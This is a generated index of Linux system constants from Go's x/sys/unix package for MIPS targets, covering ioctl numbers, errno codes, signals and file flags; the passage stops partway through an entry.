TIOCGETD (line 401) | TIOCGETD = 0x7400 constant TIOCGETP (line 402) | TIOCGETP = 0x7408 constant TIOCGEXCL (line 403) | TIOCGEXCL = 0x40045440 constant TIOCGICOUNT (line 404) | TIOCGICOUNT = 0x5492 constant TIOCGISO7816 (line 405) | TIOCGISO7816 = 0x40285442 constant TIOCGLCKTRMIOS (line 406) | TIOCGLCKTRMIOS = 0x548b constant TIOCGLTC (line 407) | TIOCGLTC = 0x7474 constant TIOCGPGRP (line 408) | TIOCGPGRP = 0x40047477 constant TIOCGPKT (line 409) | TIOCGPKT = 0x40045438 constant TIOCGPTLCK (line 410) | TIOCGPTLCK = 0x40045439 constant TIOCGPTN (line 411) | TIOCGPTN = 0x40045430 constant TIOCGPTPEER (line 412) | TIOCGPTPEER = 0x20005441 constant TIOCGRS485 (line 413) | TIOCGRS485 = 0x4020542e constant TIOCGSERIAL (line 414) | TIOCGSERIAL = 0x5484 constant TIOCGSID (line 415) | TIOCGSID = 0x7416 constant TIOCGSOFTCAR (line 416) | TIOCGSOFTCAR = 0x5481 constant TIOCGWINSZ (line 417) | TIOCGWINSZ = 0x40087468 constant TIOCINQ (line 418) | TIOCINQ = 0x467f constant TIOCLINUX (line 419) | TIOCLINUX = 0x5483 constant TIOCMBIC (line 420) | TIOCMBIC = 0x741c constant TIOCMBIS (line 421) | TIOCMBIS = 0x741b constant TIOCMGET (line 422) | TIOCMGET = 0x741d constant TIOCMIWAIT (line 423) | TIOCMIWAIT = 0x5491 constant TIOCMSET (line 424) | TIOCMSET = 0x741a constant TIOCM_CAR (line 425) | TIOCM_CAR = 0x100 constant TIOCM_CD (line 426) | TIOCM_CD = 0x100 constant TIOCM_CTS (line 427) | TIOCM_CTS = 0x40 constant TIOCM_DSR (line 428) | TIOCM_DSR = 0x400 constant TIOCM_RI (line 429) | TIOCM_RI = 0x200 constant TIOCM_RNG (line 430) | TIOCM_RNG = 0x200 constant TIOCM_SR (line 431) | TIOCM_SR = 0x20 constant TIOCM_ST (line 432) | TIOCM_ST = 0x10 constant TIOCNOTTY (line 433) | TIOCNOTTY = 0x5471 constant TIOCNXCL (line 434) | TIOCNXCL = 0x740e constant TIOCOUTQ (line 435) | TIOCOUTQ = 0x7472 constant TIOCPKT (line 436) | TIOCPKT = 0x5470 constant TIOCSBRK (line 437) | TIOCSBRK = 0x5427 constant TIOCSCTTY (line 438) | TIOCSCTTY = 0x5480 constant TIOCSERCONFIG (line 439) | TIOCSERCONFIG = 0x5488 constant TIOCSERGETLSR (line 440) | TIOCSERGETLSR = 0x548e constant TIOCSERGETMULTI (line 441) | TIOCSERGETMULTI = 0x548f constant TIOCSERGSTRUCT (line 442) | TIOCSERGSTRUCT = 0x548d constant TIOCSERGWILD (line 443) | TIOCSERGWILD = 0x5489 constant TIOCSERSETMULTI (line 444) | TIOCSERSETMULTI = 0x5490 constant TIOCSERSWILD (line 445) | TIOCSERSWILD = 0x548a constant TIOCSER_TEMT (line 446) | TIOCSER_TEMT = 0x1 constant TIOCSETD (line 447) | TIOCSETD = 0x7401 constant TIOCSETN (line 448) | TIOCSETN = 0x740a constant TIOCSETP (line 449) | TIOCSETP = 0x7409 constant TIOCSIG (line 450) | TIOCSIG = 0x80045436 constant TIOCSISO7816 (line 451) | TIOCSISO7816 = 0xc0285443 constant TIOCSLCKTRMIOS (line 452) | TIOCSLCKTRMIOS = 0x548c constant TIOCSLTC (line 453) | TIOCSLTC = 0x7475 constant TIOCSPGRP (line 454) | TIOCSPGRP = 0x80047476 constant TIOCSPTLCK (line 455) | TIOCSPTLCK = 0x80045431 constant TIOCSRS485 (line 456) | TIOCSRS485 = 0xc020542f constant TIOCSSERIAL (line 457) | TIOCSSERIAL = 0x5485 constant TIOCSSOFTCAR (line 458) | TIOCSSOFTCAR = 0x5482 constant TIOCSTI (line 459) | TIOCSTI = 0x5472 constant TIOCSWINSZ (line 460) | TIOCSWINSZ = 0x80087467 constant TIOCVHANGUP (line 461) | TIOCVHANGUP = 0x5437 constant TOSTOP (line 462) | TOSTOP = 0x8000 constant TUNATTACHFILTER (line 463) | TUNATTACHFILTER = 0x800854d5 constant TUNDETACHFILTER (line 464) | TUNDETACHFILTER = 0x800854d6 constant TUNGETDEVNETNS (line 465) | TUNGETDEVNETNS = 0x200054e3 constant TUNGETFEATURES (line 466) | TUNGETFEATURES = 0x400454cf constant TUNGETFILTER (line 467) | TUNGETFILTER = 0x400854db constant TUNGETIFF (line 468) | TUNGETIFF = 0x400454d2 constant TUNGETSNDBUF (line 469) | TUNGETSNDBUF = 0x400454d3 constant TUNGETVNETBE (line 470) | TUNGETVNETBE = 0x400454df constant TUNGETVNETHDRSZ (line 471) | TUNGETVNETHDRSZ = 0x400454d7 constant TUNGETVNETLE (line 472) | TUNGETVNETLE = 0x400454dd constant TUNSETCARRIER (line 473) | TUNSETCARRIER = 0x800454e2 constant TUNSETDEBUG (line 474) | TUNSETDEBUG = 0x800454c9 constant TUNSETFILTEREBPF (line 475) | TUNSETFILTEREBPF = 0x400454e1 constant TUNSETGROUP (line 476) | TUNSETGROUP = 0x800454ce constant TUNSETIFF (line 477) | TUNSETIFF = 0x800454ca constant TUNSETIFINDEX (line 478) | TUNSETIFINDEX = 0x800454da constant TUNSETLINK (line 479) | TUNSETLINK = 0x800454cd constant TUNSETNOCSUM (line 480) | TUNSETNOCSUM = 0x800454c8 constant TUNSETOFFLOAD (line 481) | TUNSETOFFLOAD = 0x800454d0 constant TUNSETOWNER (line 482) | TUNSETOWNER = 0x800454cc constant TUNSETPERSIST (line 483) | TUNSETPERSIST = 0x800454cb constant TUNSETQUEUE (line 484) | TUNSETQUEUE = 0x800454d9 constant TUNSETSNDBUF (line 485) | TUNSETSNDBUF = 0x800454d4 constant TUNSETSTEERINGEBPF (line 486) | TUNSETSTEERINGEBPF = 0x400454e0 constant TUNSETTXFILTER (line 487) | TUNSETTXFILTER = 0x800454d1 constant TUNSETVNETBE (line 488) | TUNSETVNETBE = 0x800454de constant TUNSETVNETHDRSZ (line 489) | TUNSETVNETHDRSZ = 0x800454d8 constant TUNSETVNETLE (line 490) | TUNSETVNETLE = 0x800454dc constant UBI_IOCATT (line 491) | UBI_IOCATT = 0x80186f40 constant UBI_IOCDET (line 492) | UBI_IOCDET = 0x80046f41 constant UBI_IOCEBCH (line 493) | UBI_IOCEBCH = 0x80044f02 constant UBI_IOCEBER (line 494) | UBI_IOCEBER = 0x80044f01 constant UBI_IOCEBISMAP (line 495) | UBI_IOCEBISMAP = 0x40044f05 constant UBI_IOCEBMAP (line 496) | UBI_IOCEBMAP = 0x80084f03 constant UBI_IOCEBUNMAP (line 497) | UBI_IOCEBUNMAP = 0x80044f04 constant UBI_IOCMKVOL (line 498) | UBI_IOCMKVOL = 0x80986f00 constant UBI_IOCRMVOL (line 499) | UBI_IOCRMVOL = 0x80046f01 constant UBI_IOCRNVOL (line 500) | UBI_IOCRNVOL = 0x91106f03 constant UBI_IOCRPEB (line 501) | UBI_IOCRPEB = 0x80046f04 constant UBI_IOCRSVOL (line 502) | UBI_IOCRSVOL = 0x800c6f02 constant UBI_IOCSETVOLPROP (line 503) | UBI_IOCSETVOLPROP = 0x80104f06 constant UBI_IOCSPEB (line 504) | UBI_IOCSPEB = 0x80046f05 constant UBI_IOCVOLCRBLK (line 505) | UBI_IOCVOLCRBLK = 0x80804f07 constant UBI_IOCVOLRMBLK (line 506) | UBI_IOCVOLRMBLK = 0x20004f08 constant UBI_IOCVOLUP (line 507) | UBI_IOCVOLUP = 0x80084f00 constant VDISCARD (line 508) | VDISCARD = 0xd constant VEOF (line 509) | VEOF = 0x10 constant VEOL (line 510) | VEOL = 0x11 constant VEOL2 (line 511) | VEOL2 = 0x6 constant VMIN (line 512) | VMIN = 0x4 constant VREPRINT (line 513) | VREPRINT = 0xc constant VSTART (line 514) | VSTART = 0x8 constant VSTOP (line 515) | VSTOP = 0x9 constant VSUSP (line 516) | VSUSP = 0xa constant VSWTC (line 517) | VSWTC = 0x7 constant VSWTCH (line 518) | VSWTCH = 0x7 constant VT1 (line 519) | VT1 = 0x4000 constant VTDLY (line 520) | VTDLY = 0x4000 constant VTIME (line 521) | VTIME = 0x5 constant VWERASE (line 522) | VWERASE = 0xe constant WDIOC_GETBOOTSTATUS (line 523) | WDIOC_GETBOOTSTATUS = 0x40045702 constant WDIOC_GETPRETIMEOUT (line 524) | WDIOC_GETPRETIMEOUT = 0x40045709 constant WDIOC_GETSTATUS (line 525) | WDIOC_GETSTATUS = 0x40045701 constant WDIOC_GETSUPPORT (line 526) | WDIOC_GETSUPPORT = 0x40285700 constant WDIOC_GETTEMP (line 527) | WDIOC_GETTEMP = 0x40045703 constant WDIOC_GETTIMELEFT (line 528) | WDIOC_GETTIMELEFT = 0x4004570a constant WDIOC_GETTIMEOUT (line 529) | WDIOC_GETTIMEOUT = 0x40045707 constant WDIOC_KEEPALIVE (line 530) | WDIOC_KEEPALIVE = 0x40045705 constant WDIOC_SETOPTIONS (line 531) | WDIOC_SETOPTIONS = 0x40045704 constant WORDSIZE (line 532) | WORDSIZE = 0x20 constant XCASE (line 533) | XCASE = 0x4 constant XTABS (line 534) | XTABS = 0x1800 constant _HIDIOCGRAWNAME (line 535) | _HIDIOCGRAWNAME = 0x40804804 constant _HIDIOCGRAWPHYS (line 536) | _HIDIOCGRAWPHYS = 0x40404805 constant _HIDIOCGRAWUNIQ (line 537) | _HIDIOCGRAWUNIQ = 0x40404808 constant EADDRINUSE (line 542) | EADDRINUSE = syscall.Errno(0x7d) constant EADDRNOTAVAIL (line 543) | EADDRNOTAVAIL = syscall.Errno(0x7e) constant EADV (line 544) | EADV = syscall.Errno(0x44) constant EAFNOSUPPORT (line 545) | EAFNOSUPPORT = syscall.Errno(0x7c) constant EALREADY (line 546) | EALREADY = syscall.Errno(0x95) constant EBADE (line 547) | EBADE = syscall.Errno(0x32) constant EBADFD (line 548) | EBADFD = syscall.Errno(0x51) constant EBADMSG (line 549) | EBADMSG = syscall.Errno(0x4d) constant EBADR (line 550) | EBADR = syscall.Errno(0x33) constant EBADRQC (line 551) | EBADRQC = syscall.Errno(0x36) constant EBADSLT (line 552) | EBADSLT = syscall.Errno(0x37) constant EBFONT (line 553) | EBFONT = syscall.Errno(0x3b) constant ECANCELED (line 554) | ECANCELED = syscall.Errno(0x9e) constant ECHRNG (line 555) | ECHRNG = syscall.Errno(0x25) constant ECOMM (line 556) | ECOMM = syscall.Errno(0x46) constant ECONNABORTED (line 557) | ECONNABORTED = syscall.Errno(0x82) constant ECONNREFUSED (line 558) | ECONNREFUSED = syscall.Errno(0x92) constant ECONNRESET (line 559) | ECONNRESET = syscall.Errno(0x83) constant EDEADLK (line 560) | EDEADLK = syscall.Errno(0x2d) constant EDEADLOCK (line 561) | EDEADLOCK = syscall.Errno(0x38) constant EDESTADDRREQ (line 562) | EDESTADDRREQ = syscall.Errno(0x60) constant EDOTDOT (line 563) | EDOTDOT = syscall.Errno(0x49) constant EDQUOT (line 564) | EDQUOT = syscall.Errno(0x46d) constant EHOSTDOWN (line 565) | EHOSTDOWN = syscall.Errno(0x93) constant EHOSTUNREACH (line 566) | EHOSTUNREACH = syscall.Errno(0x94) constant EHWPOISON (line 567) | EHWPOISON = syscall.Errno(0xa8) constant EIDRM (line 568) | EIDRM = syscall.Errno(0x24) constant EILSEQ (line 569) | EILSEQ = syscall.Errno(0x58) constant EINIT (line 570) | EINIT = syscall.Errno(0x8d) constant EINPROGRESS (line 571) | EINPROGRESS = syscall.Errno(0x96) constant EISCONN (line 572) | EISCONN = syscall.Errno(0x85) constant EISNAM (line 573) | EISNAM = syscall.Errno(0x8b) constant EKEYEXPIRED (line 574) | EKEYEXPIRED = syscall.Errno(0xa2) constant EKEYREJECTED (line 575) | EKEYREJECTED = syscall.Errno(0xa4) constant EKEYREVOKED (line 576) | EKEYREVOKED = syscall.Errno(0xa3) constant EL2HLT (line 577) | EL2HLT = syscall.Errno(0x2c) constant EL2NSYNC (line 578) | EL2NSYNC = syscall.Errno(0x26) constant EL3HLT (line 579) | EL3HLT = syscall.Errno(0x27) constant EL3RST (line 580) | EL3RST = syscall.Errno(0x28) constant ELIBACC (line 581) | ELIBACC = syscall.Errno(0x53) constant ELIBBAD (line 582) | ELIBBAD = syscall.Errno(0x54) constant ELIBEXEC (line 583) | ELIBEXEC = syscall.Errno(0x57) constant ELIBMAX (line 584) | ELIBMAX = syscall.Errno(0x56) constant ELIBSCN (line 585) | ELIBSCN = syscall.Errno(0x55) constant ELNRNG (line 586) | ELNRNG = syscall.Errno(0x29) constant ELOOP (line 587) | ELOOP = syscall.Errno(0x5a) constant EMEDIUMTYPE (line 588) | EMEDIUMTYPE = syscall.Errno(0xa0) constant EMSGSIZE (line 589) | EMSGSIZE = syscall.Errno(0x61) constant EMULTIHOP (line 590) | EMULTIHOP = syscall.Errno(0x4a) constant ENAMETOOLONG (line 591) | ENAMETOOLONG = syscall.Errno(0x4e) constant ENAVAIL (line 592) | ENAVAIL = syscall.Errno(0x8a) constant ENETDOWN (line 593) | ENETDOWN = syscall.Errno(0x7f) constant ENETRESET (line 594) | ENETRESET = syscall.Errno(0x81) constant ENETUNREACH (line 595) | ENETUNREACH = syscall.Errno(0x80) constant ENOANO (line 596) | ENOANO = syscall.Errno(0x35) constant ENOBUFS (line 597) | ENOBUFS = syscall.Errno(0x84) constant ENOCSI (line 598) | ENOCSI = syscall.Errno(0x2b) constant ENODATA (line 599) | ENODATA = syscall.Errno(0x3d) constant ENOKEY (line 600) | ENOKEY = syscall.Errno(0xa1) constant ENOLCK (line 601) | ENOLCK = syscall.Errno(0x2e) constant ENOLINK (line 602) | ENOLINK = syscall.Errno(0x43) constant ENOMEDIUM (line 603) | ENOMEDIUM = syscall.Errno(0x9f) constant ENOMSG (line 604) | ENOMSG = syscall.Errno(0x23) constant ENONET (line 605) | ENONET = syscall.Errno(0x40) constant ENOPKG (line 606) | ENOPKG = syscall.Errno(0x41) constant ENOPROTOOPT (line 607) | ENOPROTOOPT = syscall.Errno(0x63) constant ENOSR (line 608) | ENOSR = syscall.Errno(0x3f) constant ENOSTR (line 609) | ENOSTR = syscall.Errno(0x3c) constant ENOSYS (line 610) | ENOSYS = syscall.Errno(0x59) constant ENOTCONN (line 611) | ENOTCONN = syscall.Errno(0x86) constant ENOTEMPTY (line 612) | ENOTEMPTY = syscall.Errno(0x5d) constant ENOTNAM (line 613) | ENOTNAM = syscall.Errno(0x89) constant ENOTRECOVERABLE (line 614) | ENOTRECOVERABLE = syscall.Errno(0xa6) constant ENOTSOCK (line 615) | ENOTSOCK = syscall.Errno(0x5f) constant ENOTSUP (line 616) | ENOTSUP = syscall.Errno(0x7a) constant ENOTUNIQ (line 617) | ENOTUNIQ = syscall.Errno(0x50) constant EOPNOTSUPP (line 618) | EOPNOTSUPP = syscall.Errno(0x7a) constant EOVERFLOW (line 619) | EOVERFLOW = syscall.Errno(0x4f) constant EOWNERDEAD (line 620) | EOWNERDEAD = syscall.Errno(0xa5) constant EPFNOSUPPORT (line 621) | EPFNOSUPPORT = syscall.Errno(0x7b) constant EPROTO (line 622) | EPROTO = syscall.Errno(0x47) constant EPROTONOSUPPORT (line 623) | EPROTONOSUPPORT = syscall.Errno(0x78) constant EPROTOTYPE (line 624) | EPROTOTYPE = syscall.Errno(0x62) constant EREMCHG (line 625) | EREMCHG = syscall.Errno(0x52) constant EREMDEV (line 626) | EREMDEV = syscall.Errno(0x8e) constant EREMOTE (line 627) | EREMOTE = syscall.Errno(0x42) constant EREMOTEIO (line 628) | EREMOTEIO = syscall.Errno(0x8c) constant ERESTART (line 629) | ERESTART = syscall.Errno(0x5b) constant ERFKILL (line 630) | ERFKILL = syscall.Errno(0xa7) constant ESHUTDOWN (line 631) | ESHUTDOWN = syscall.Errno(0x8f) constant ESOCKTNOSUPPORT (line 632) | ESOCKTNOSUPPORT = syscall.Errno(0x79) constant ESRMNT (line 633) | ESRMNT = syscall.Errno(0x45) constant ESTALE (line 634) | ESTALE = syscall.Errno(0x97) constant ESTRPIPE (line 635) | ESTRPIPE = syscall.Errno(0x5c) constant ETIME (line 636) | ETIME = syscall.Errno(0x3e) constant ETIMEDOUT (line 637) | ETIMEDOUT = syscall.Errno(0x91) constant ETOOMANYREFS (line 638) | ETOOMANYREFS = syscall.Errno(0x90) constant EUCLEAN (line 639) | EUCLEAN = syscall.Errno(0x87) constant EUNATCH (line 640) | EUNATCH = syscall.Errno(0x2a) constant EUSERS (line 641) | EUSERS = syscall.Errno(0x5e) constant EXFULL (line 642) | EXFULL = syscall.Errno(0x34) constant SIGBUS (line 647) | SIGBUS = syscall.Signal(0xa) constant SIGCHLD (line 648) | SIGCHLD = syscall.Signal(0x12) constant SIGCLD (line 649) | SIGCLD = syscall.Signal(0x12) constant SIGCONT (line 650) | SIGCONT = syscall.Signal(0x19) constant SIGEMT (line 651) | SIGEMT = syscall.Signal(0x7) constant SIGIO (line 652) | SIGIO = syscall.Signal(0x16) constant SIGPOLL (line 653) | SIGPOLL = syscall.Signal(0x16) constant SIGPROF (line 654) | SIGPROF = syscall.Signal(0x1d) constant SIGPWR (line 655) | SIGPWR = syscall.Signal(0x13) constant SIGSTOP (line 656) | SIGSTOP = syscall.Signal(0x17) constant SIGSYS (line 657) | SIGSYS = syscall.Signal(0xc) constant SIGTSTP (line 658) | SIGTSTP = syscall.Signal(0x18) constant SIGTTIN (line 659) | SIGTTIN = syscall.Signal(0x1a) constant SIGTTOU (line 660) | SIGTTOU = syscall.Signal(0x1b) constant SIGURG (line 661) | SIGURG = syscall.Signal(0x15) constant SIGUSR1 (line 662) | SIGUSR1 = syscall.Signal(0x10) constant SIGUSR2 (line 663) | SIGUSR2 = syscall.Signal(0x11) constant SIGVTALRM (line 664) | SIGVTALRM = syscall.Signal(0x1c) constant SIGWINCH (line 665) | SIGWINCH = syscall.Signal(0x14) constant SIGXCPU (line 666) | SIGXCPU = syscall.Signal(0x1e) constant SIGXFSZ (line 667) | SIGXFSZ = syscall.Signal(0x1f) FILE: vendor/golang.org/x/sys/unix/zerrors_linux_mips64.go constant B1000000 (line 14) | B1000000 = 0x1008 constant B115200 (line 15) | B115200 = 0x1002 constant B1152000 (line 16) | B1152000 = 0x1009 constant B1500000 (line 17) | B1500000 = 0x100a constant B2000000 (line 18) | B2000000 = 0x100b constant B230400 (line 19) | B230400 = 0x1003 constant B2500000 (line 20) | B2500000 = 0x100c constant B3000000 (line 21) | B3000000 = 0x100d constant B3500000 (line 22) | B3500000 = 0x100e constant B4000000 (line 23) | B4000000 = 0x100f constant B460800 (line 24) | B460800 = 0x1004 constant B500000 (line 25) | B500000 = 0x1005 constant B57600 (line 26) | B57600 = 0x1001 constant B576000 (line 27) | B576000 = 0x1006 constant B921600 (line 28) | B921600 = 0x1007 constant BLKALIGNOFF (line 29) | BLKALIGNOFF = 0x2000127a constant BLKBSZGET (line 30) | BLKBSZGET = 0x40081270 constant BLKBSZSET (line 31) | BLKBSZSET = 0x80081271 constant BLKDISCARD (line 32) | BLKDISCARD = 0x20001277 constant BLKDISCARDZEROES (line 33) | BLKDISCARDZEROES = 0x2000127c constant BLKFLSBUF (line 34) | BLKFLSBUF = 0x20001261 constant BLKFRAGET (line 35) | BLKFRAGET = 0x20001265 constant BLKFRASET (line 36) | BLKFRASET = 0x20001264 constant BLKGETDISKSEQ (line 37) | BLKGETDISKSEQ = 0x40081280 constant BLKGETSIZE (line 38) | BLKGETSIZE = 0x20001260 constant BLKGETSIZE64 (line 39) | BLKGETSIZE64 = 0x40081272 constant BLKIOMIN (line 40) | BLKIOMIN = 0x20001278 constant BLKIOOPT (line 41) | BLKIOOPT = 0x20001279 constant BLKPBSZGET (line 42) | BLKPBSZGET = 0x2000127b constant BLKRAGET (line 43) | BLKRAGET = 0x20001263 constant BLKRASET (line 44) | BLKRASET = 0x20001262 constant BLKROGET (line 45) | BLKROGET = 0x2000125e constant BLKROSET (line 46) | BLKROSET = 0x2000125d constant BLKROTATIONAL (line 47) | BLKROTATIONAL = 0x2000127e constant BLKRRPART (line 48) | BLKRRPART = 0x2000125f constant BLKSECDISCARD (line 49) | BLKSECDISCARD = 0x2000127d constant BLKSECTGET (line 50) | BLKSECTGET = 0x20001267 constant BLKSECTSET (line 51) | BLKSECTSET = 0x20001266 constant BLKSSZGET (line 52) | BLKSSZGET = 0x20001268 constant BLKZEROOUT (line 53) | BLKZEROOUT = 0x2000127f constant BOTHER (line 54) | BOTHER = 0x1000 constant BS1 (line 55) | BS1 = 0x2000 constant BSDLY (line 56) | BSDLY = 0x2000 constant CBAUD (line 57) | CBAUD = 0x100f constant CBAUDEX (line 58) | CBAUDEX = 0x1000 constant CIBAUD (line 59) | CIBAUD = 0x100f0000 constant CLOCAL (line 60) | CLOCAL = 0x800 constant CR1 (line 61) | CR1 = 0x200 constant CR2 (line 62) | CR2 = 0x400 constant CR3 (line 63) | CR3 = 0x600 constant CRDLY (line 64) | CRDLY = 0x600 constant CREAD (line 65) | CREAD = 0x80 constant CS6 (line 66) | CS6 = 0x10 constant CS7 (line 67) | CS7 = 0x20 constant CS8 (line 68) | CS8 = 0x30 constant CSIZE (line 69) | CSIZE = 0x30 constant CSTOPB (line 70) | CSTOPB = 0x40 constant ECCGETLAYOUT (line 71) | ECCGETLAYOUT = 0x41484d11 constant ECCGETSTATS (line 72) | ECCGETSTATS = 0x40104d12 constant ECHOCTL (line 73) | ECHOCTL = 0x200 constant ECHOE (line 74) | ECHOE = 0x10 constant ECHOK (line 75) | ECHOK = 0x20 constant ECHOKE (line 76) | ECHOKE = 0x800 constant ECHONL (line 77) | ECHONL = 0x40 constant ECHOPRT (line 78) | ECHOPRT = 0x400 constant EFD_CLOEXEC (line 79) | EFD_CLOEXEC = 0x80000 constant EFD_NONBLOCK (line 80) | EFD_NONBLOCK = 0x80 constant EPOLL_CLOEXEC (line 81) | EPOLL_CLOEXEC = 0x80000 constant EXTPROC (line 82) | EXTPROC = 0x10000 constant FF1 (line 83) | FF1 = 0x8000 constant FFDLY (line 84) | FFDLY = 0x8000 constant FICLONE (line 85) | FICLONE = 0x80049409 constant FICLONERANGE (line 86) | FICLONERANGE = 0x8020940d constant FLUSHO (line 87) | FLUSHO = 0x2000 constant FS_IOC_ENABLE_VERITY (line 88) | FS_IOC_ENABLE_VERITY = 0x80806685 constant FS_IOC_GETFLAGS (line 89) | FS_IOC_GETFLAGS = 0x40086601 constant FS_IOC_GET_ENCRYPTION_NONCE (line 90) | FS_IOC_GET_ENCRYPTION_NONCE = 0x4010661b constant FS_IOC_GET_ENCRYPTION_POLICY (line 91) | FS_IOC_GET_ENCRYPTION_POLICY = 0x800c6615 constant FS_IOC_GET_ENCRYPTION_PWSALT (line 92) | FS_IOC_GET_ENCRYPTION_PWSALT = 0x80106614 constant FS_IOC_SETFLAGS (line 93) | FS_IOC_SETFLAGS = 0x80086602 constant FS_IOC_SET_ENCRYPTION_POLICY (line 94) | FS_IOC_SET_ENCRYPTION_POLICY = 0x400c6613 constant F_GETLK (line 95) | F_GETLK = 0xe constant F_GETLK64 (line 96) | F_GETLK64 = 0xe constant F_GETOWN (line 97) | F_GETOWN = 0x17 constant F_RDLCK (line 98) | F_RDLCK = 0x0 constant F_SETLK (line 99) | F_SETLK = 0x6 constant F_SETLK64 (line 100) | F_SETLK64 = 0x6 constant F_SETLKW (line 101) | F_SETLKW = 0x7 constant F_SETLKW64 (line 102) | F_SETLKW64 = 0x7 constant F_SETOWN (line 103) | F_SETOWN = 0x18 constant F_UNLCK (line 104) | F_UNLCK = 0x2 constant F_WRLCK (line 105) | F_WRLCK = 0x1 constant HIDIOCGRAWINFO (line 106) | HIDIOCGRAWINFO = 0x40084803 constant HIDIOCGRDESC (line 107) | HIDIOCGRDESC = 0x50044802 constant HIDIOCGRDESCSIZE (line 108) | HIDIOCGRDESCSIZE = 0x40044801 constant HUPCL (line 109) | HUPCL = 0x400 constant ICANON (line 110) | ICANON = 0x2 constant IEXTEN (line 111) | IEXTEN = 0x100 constant IN_CLOEXEC (line 112) | IN_CLOEXEC = 0x80000 constant IN_NONBLOCK (line 113) | IN_NONBLOCK = 0x80 constant IOCTL_VM_SOCKETS_GET_LOCAL_CID (line 114) | IOCTL_VM_SOCKETS_GET_LOCAL_CID = 0x200007b9 constant ISIG (line 115) | ISIG = 0x1 constant IUCLC (line 116) | IUCLC = 0x200 constant IXOFF (line 117) | IXOFF = 0x1000 constant IXON (line 118) | IXON = 0x400 constant MAP_ANON (line 119) | MAP_ANON = 0x800 constant MAP_ANONYMOUS (line 120) | MAP_ANONYMOUS = 0x800 constant MAP_DENYWRITE (line 121) | MAP_DENYWRITE = 0x2000 constant MAP_EXECUTABLE (line 122) | MAP_EXECUTABLE = 0x4000 constant MAP_GROWSDOWN (line 123) | MAP_GROWSDOWN = 0x1000 constant MAP_HUGETLB (line 124) | MAP_HUGETLB = 0x80000 constant MAP_LOCKED (line 125) | MAP_LOCKED = 0x8000 constant MAP_NONBLOCK (line 126) | MAP_NONBLOCK = 0x20000 constant MAP_NORESERVE (line 127) | MAP_NORESERVE = 0x400 constant MAP_POPULATE (line 128) | MAP_POPULATE = 0x10000 constant MAP_RENAME (line 129) | MAP_RENAME = 0x800 constant MAP_STACK (line 130) | MAP_STACK = 0x40000 constant MCL_CURRENT (line 131) | MCL_CURRENT = 0x1 constant MCL_FUTURE (line 132) | MCL_FUTURE = 0x2 constant MCL_ONFAULT (line 133) | MCL_ONFAULT = 0x4 constant MEMERASE (line 134) | MEMERASE = 0x80084d02 constant MEMERASE64 (line 135) | MEMERASE64 = 0x80104d14 constant MEMGETBADBLOCK (line 136) | MEMGETBADBLOCK = 0x80084d0b constant MEMGETINFO (line 137) | MEMGETINFO = 0x40204d01 constant MEMGETOOBSEL (line 138) | MEMGETOOBSEL = 0x40c84d0a constant MEMGETREGIONCOUNT (line 139) | MEMGETREGIONCOUNT = 0x40044d07 constant MEMISLOCKED (line 140) | MEMISLOCKED = 0x40084d17 constant MEMLOCK (line 141) | MEMLOCK = 0x80084d05 constant MEMREAD (line 142) | MEMREAD = 0xc0404d1a constant MEMREADOOB (line 143) | MEMREADOOB = 0xc0104d04 constant MEMSETBADBLOCK (line 144) | MEMSETBADBLOCK = 0x80084d0c constant MEMUNLOCK (line 145) | MEMUNLOCK = 0x80084d06 constant MEMWRITEOOB (line 146) | MEMWRITEOOB = 0xc0104d03 constant MTDFILEMODE (line 147) | MTDFILEMODE = 0x20004d13 constant NFDBITS (line 148) | NFDBITS = 0x40 constant NLDLY (line 149) | NLDLY = 0x100 constant NOFLSH (line 150) | NOFLSH = 0x80 constant NS_GET_NSTYPE (line 151) | NS_GET_NSTYPE = 0x2000b703 constant NS_GET_OWNER_UID (line 152) | NS_GET_OWNER_UID = 0x2000b704 constant NS_GET_PARENT (line 153) | NS_GET_PARENT = 0x2000b702 constant NS_GET_USERNS (line 154) | NS_GET_USERNS = 0x2000b701 constant OLCUC (line 155) | OLCUC = 0x2 constant ONLCR (line 156) | ONLCR = 0x4 constant OTPERASE (line 157) | OTPERASE = 0x800c4d19 constant OTPGETREGIONCOUNT (line 158) | OTPGETREGIONCOUNT = 0x80044d0e constant OTPGETREGIONINFO (line 159) | OTPGETREGIONINFO = 0x800c4d0f constant OTPLOCK (line 160) | OTPLOCK = 0x400c4d10 constant OTPSELECT (line 161) | OTPSELECT = 0x40044d0d constant O_APPEND (line 162) | O_APPEND = 0x8 constant O_ASYNC (line 163) | O_ASYNC = 0x1000 constant O_CLOEXEC (line 164) | O_CLOEXEC = 0x80000 constant O_CREAT (line 165) | O_CREAT = 0x100 constant O_DIRECT (line 166) | O_DIRECT = 0x8000 constant O_DIRECTORY (line 167) | O_DIRECTORY = 0x10000 constant O_DSYNC (line 168) | O_DSYNC = 0x10 constant O_EXCL (line 169) | O_EXCL = 0x400 constant O_FSYNC (line 170) | O_FSYNC = 0x4010 constant O_LARGEFILE (line 171) | O_LARGEFILE = 0x0 constant O_NDELAY (line 172) | O_NDELAY = 0x80 constant O_NOATIME (line 173) | O_NOATIME = 0x40000 constant O_NOCTTY (line 174) | O_NOCTTY = 0x800 constant O_NOFOLLOW (line 175) | O_NOFOLLOW = 0x20000 constant O_NONBLOCK (line 176) | O_NONBLOCK = 0x80 constant O_PATH (line 177) | O_PATH = 0x200000 constant O_RSYNC (line 178) | O_RSYNC = 0x4010 constant O_SYNC (line 179) | O_SYNC = 0x4010 constant O_TMPFILE (line 180) | O_TMPFILE = 0x410000 constant O_TRUNC (line 181) | O_TRUNC = 0x200 constant PARENB (line 182) | PARENB = 0x100 constant PARODD (line 183) | PARODD = 0x200 constant PENDIN (line 184) | PENDIN = 0x4000 constant PERF_EVENT_IOC_DISABLE (line 185) | PERF_EVENT_IOC_DISABLE = 0x20002401 constant PERF_EVENT_IOC_ENABLE (line 186) | PERF_EVENT_IOC_ENABLE = 0x20002400 constant PERF_EVENT_IOC_ID (line 187) | PERF_EVENT_IOC_ID = 0x40082407 constant PERF_EVENT_IOC_MODIFY_ATTRIBUTES (line 188) | PERF_EVENT_IOC_MODIFY_ATTRIBUTES = 0x8008240b constant PERF_EVENT_IOC_PAUSE_OUTPUT (line 189) | PERF_EVENT_IOC_PAUSE_OUTPUT = 0x80042409 constant PERF_EVENT_IOC_PERIOD (line 190) | PERF_EVENT_IOC_PERIOD = 0x80082404 constant PERF_EVENT_IOC_QUERY_BPF (line 191) | PERF_EVENT_IOC_QUERY_BPF = 0xc008240a constant PERF_EVENT_IOC_REFRESH (line 192) | PERF_EVENT_IOC_REFRESH = 0x20002402 constant PERF_EVENT_IOC_RESET (line 193) | PERF_EVENT_IOC_RESET = 0x20002403 constant 